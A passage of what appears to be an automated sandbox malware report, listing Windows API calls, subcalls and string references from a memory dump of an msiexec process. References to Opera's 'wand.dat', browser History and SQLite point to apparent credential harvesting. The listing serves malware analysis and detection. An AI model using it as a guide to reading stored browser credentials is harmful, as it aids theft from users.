                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                        • free.MSVCRT ref: 00417544
                                                                                        • free.MSVCRT ref: 00417562
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 4131324427-0
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                        • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                        • free.MSVCRT ref: 0041822B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PathTemp$free
                                                                                        • String ID: %s\etilqs_$etilqs_
                                                                                        • API String ID: 924794160-1420421710
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040FDD5
                                                                                          • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                        • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                                        • API String ID: 1775345501-2769808009
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastMessage_snwprintf
                                                                                        • String ID: Error$Error %d: %s
                                                                                        • API String ID: 313946961-1552265934
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: foreign key constraint failed$new$oid$old
                                                                                        • API String ID: 0-1953309616
                                                                                        APIs
                                                                                        Strings
                                                                                        • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                        • API String ID: 3510742995-272990098
                                                                                        APIs
                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                          • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                        • memset.MSVCRT ref: 0040C439
                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                        • _wcsupr.MSVCRT ref: 0040C481
                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                        • memset.MSVCRT ref: 0040C4D0
                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0044A6EB
                                                                                        • memset.MSVCRT ref: 0044A6FB
                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: gj
                                                                                        APIs
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                        • free.MSVCRT ref: 0040E9D3
                                                                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@$free
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                        • malloc.MSVCRT ref: 004174BD
                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                        • free.MSVCRT ref: 004174E4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 0040D453
                                                                                        • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                        • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                        • String ID:
                                                                                        APIs
                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                        • memset.MSVCRT ref: 004450CD
                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                          • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • wcscpy.MSVCRT ref: 0044475F
                                                                                        • wcscat.MSVCRT ref: 0044476E
                                                                                        • wcscat.MSVCRT ref: 0044477F
                                                                                        • wcscat.MSVCRT ref: 0044478E
                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                          • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                          • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                        • String ID: \StringFileInfo\
                                                                                        APIs
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@
                                                                                        • String ID:
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memicmpwcslen
                                                                                        • String ID: @@@@$History
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004100FB
                                                                                        • memset.MSVCRT ref: 00410112
                                                                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                        • _snwprintf.MSVCRT ref: 00410141
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                        • String ID: </%s>
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040D58D
                                                                                        • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                        • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChildEnumTextWindowWindowsmemset
                                                                                        • String ID: caption
                                                                                        APIs
                                                                                          • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                          • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                        • String ID: MS Sans Serif
                                                                                        • API String ID: 210187428-168460110
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcsicmpmemset
                                                                                        • String ID: edit
                                                                                        • API String ID: 2747424523-2167791130
                                                                                        APIs
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                        • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                                        • API String ID: 3150196962-1506664499
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                        Similarity
                                                                                        • API ID: memcpy$memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 3384217055-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 368790112-0
                                                                                        APIs
                                                                                          • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                          • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                          • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                          • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                          • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                        • GetMenu.USER32(?), ref: 00410F8D
                                                                                        • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                        • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                        • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                        Similarity
                                                                                        • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                        • String ID:
                                                                                        • API String ID: 1889144086-0
                                                                                        APIs
                                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                        • GetLastError.KERNEL32 ref: 0041810A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                        • String ID:
                                                                                        • API String ID: 1661045500-0
                                                                                        APIs
                                                                                          • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                        • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                        Strings
                                                                                        • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                        • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                        • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                        • API String ID: 1297977491-2063813899
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040560C
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                          • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                        • String ID: *.*$dat$wand.dat
                                                                                        • API String ID: 2618321458-1828844352
                                                                                        APIs
                                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                        • wcslen.MSVCRT ref: 00410C74
                                                                                        • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                        • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                        • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 1549203181-0
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00412057
                                                                                          • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                        • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                        • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                        Similarity
                                                                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                        • String ID:
                                                                                        • API String ID: 3550944819-0
                                                                                        APIs
                                                                                        • free.MSVCRT ref: 0040F561
                                                                                        • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                        • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memcpy$free
                                                                                        • String ID: g4@
                                                                                        • API String ID: 2888793982-2133833424
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                        • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: @
                                                                                        APIs
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                        • memset.MSVCRT ref: 0040AF18
                                                                                        • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                        Similarity
                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004144E7
                                                                                          • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                          • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                        • memset.MSVCRT ref: 0041451A
                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                        • memset.MSVCRT ref: 0042FED3
                                                                                        • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID: sqlite_master
                                                                                        APIs
                                                                                        • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                        • wcscpy.MSVCRT ref: 00414DF3
                                                                                        Similarity
                                                                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                        • String ID:
                                                                                        APIs
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                        • _snwprintf.MSVCRT ref: 00410FE1
                                                                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                        • _snwprintf.MSVCRT ref: 0041100C
                                                                                        • wcscat.MSVCRT ref: 0041101F
                                                                                        Similarity
                                                                                        • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                        • malloc.MSVCRT ref: 00417459
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                                                                        • free.MSVCRT ref: 0041747F
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                        • RegisterClassW.USER32(?), ref: 00412428
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                        • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                        Similarity
                                                                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                        • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                        • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Item
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00417B7B
                                                                                        • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                        • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                        • GetLastError.KERNEL32 ref: 00417BB5
                                                                                        Similarity
                                                                                        • API ID: File$ErrorLastLockUnlockmemset
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040F673
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                        • strlen.MSVCRT ref: 0040F6A2
                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                        Similarity
                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040F6E2
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                        • strlen.MSVCRT ref: 0040F70D
                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                        Similarity
                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00402FD7
